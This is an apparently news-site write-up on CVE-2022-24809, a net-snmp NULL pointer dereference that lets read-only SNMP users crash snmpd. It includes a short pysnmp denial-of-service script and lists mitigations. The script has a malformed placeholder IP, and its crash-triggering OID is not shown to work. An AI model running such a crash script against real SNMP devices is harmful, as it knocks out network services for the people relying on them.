CVE CyberSecurity Database News

CVE-2022-24809 - Exploiting a NULL Pointer Dereference in net-snmp's nsVacmAccessTable

Poster -

net-snmp is a widely used suite for Simple Network Management Protocol (SNMP) operations, often embedded in everything from Linux servers to networking appliances. In April 2022, a critical vulnerability was disclosed: CVE-2022-24809, which allows even read-only users to crash the snmpd daemon using a crafted SNMP GET-NEXT request. This post breaks down the bug, demonstrates exploitation, and—most importantly—explains how to stay secure.

What Is CVE-2022-24809?

Prior to version 5.9.2, net-snmp’s code handling the nsVacmAccessTable in SNMP had a flaw: If you send a specially-crafted SNMP request (specifically, a malformed OID in a GET-NEXT operation) to devices, it can trigger a NULL pointer dereference in the agent. In plain terms: Anyone with knowledge of a valid SNMP community string could reliably crash the snmpd process.

- GitHub advisory notice
- NIST NVD entry
- net-snmp patch commit

How Does Exploitation Work?

Anyone who knows the SNMP community string (for v1/v2c) or has SNMP v3 credentials, even read-only, can exploit this bug. The trick is to perform a GET-NEXT operation using a malformed Object Identifier (OID) on the nsVacmAccessTable subtree.

Python Exploitation Example: Using pysnmp

Here’s a simple script using pysnmp that demonstrates how to crash an affected net-snmp agent:

from pysnmp.hlapi import *

# Replace with your target information
TARGET_IP = '192..2.100'
COMMUNITY = 'public'  # Use known SNMP community string
PORT = 161

# Malformed OID targeting nsVacmAccessTable (1.3.6.1.4.1.8072.2.2.1)
# Provided example OID with a missing or misaligned sub-identifier
MALFORMED_OID = '1.3.6.1.4.1.8072.2.2.1.999999'

errorIndication, errorStatus, errorIndex, varBinds = next(
    nextCmd(
        SnmpEngine(),
        CommunityData(COMMUNITY, mpModel=1),  # 1=SNMPv2c
        UdpTransportTarget((TARGET_IP, PORT)),
        ContextData(),
        ObjectType(ObjectIdentity(MALFORMED_OID)),
        lexicographicMode=False
    )
)

# The snmpd should crash or hang with a NULL pointer dereference if unpatched
print("Request sent, check if SNMPd is alive.")

*Note*: This script assumes the target is vulnerable and only for authorized security testing.

What’s Going On Under the Hood?

The net-snmp code prior to 5.9.2 doesn’t handle certain malformed OIDs well when traversing the nsVacmAccessTable. This table is tied to SNMP View-Based Access Control and isn’t normally queried by regular clients. Supplying an out-of-bounds or ill-structured OID can cause the internal handler to dereference NULL, which instantly crashes the daemon.

Result: DoS (denial of service) until the service is restarted.

Mitigation Steps

1. Upgrade Immediately:
The best way to fix this is to *upgrade to net-snmp 5.9.2 or later.* This version includes the patch that sanitizes OID requests and prevents the crash.

2. Use Strong SNMPv3 Credentials:
If possible, switch to SNMPv3 with encrypted and authenticated access for read and write operations. SNMPv1 and SNMPv2c are less secure—community strings are effectively cleartext passwords.

3. Restrict SNMP Access:
Regardless of SNMP version, only allow trusted management IPs to send SNMP requests to your device. Add firewall rules or SNMP access controls to permit queries *only* from management networks.

4. Disable Unused Versions:
Only enable SNMPv1/v2c if you absolutely need them. Otherwise, disable them and enforce SNMPv3 only.

5. Use Strong & Unique Community Strings:
If you must use SNMPv1 or v2c, at least use a complex community string, not “public” or “private”.

6. Monitor for SNMP Daemon Restarts:
Keep an eye on system logs for frequent snmpd restarts—which may indicate exploitation attempts.

Conclusion

CVE-2022-24809 is a potent example of how even read-only SNMP users can crash services with the right incantation. Denial-of-service vulnerabilities like this can be used for both nuisance attacks and as part of larger, chained exploits.

References

- net-snmp Security Advisory on GitHub
- CVE-2022-24809 @ NIST NVD
- Security Patch diff


If you found this write-up useful, share it among your team or security group. Knowledge beats zero-days!

Timeline

Published on: 04/16/2024 20:15:09 UTC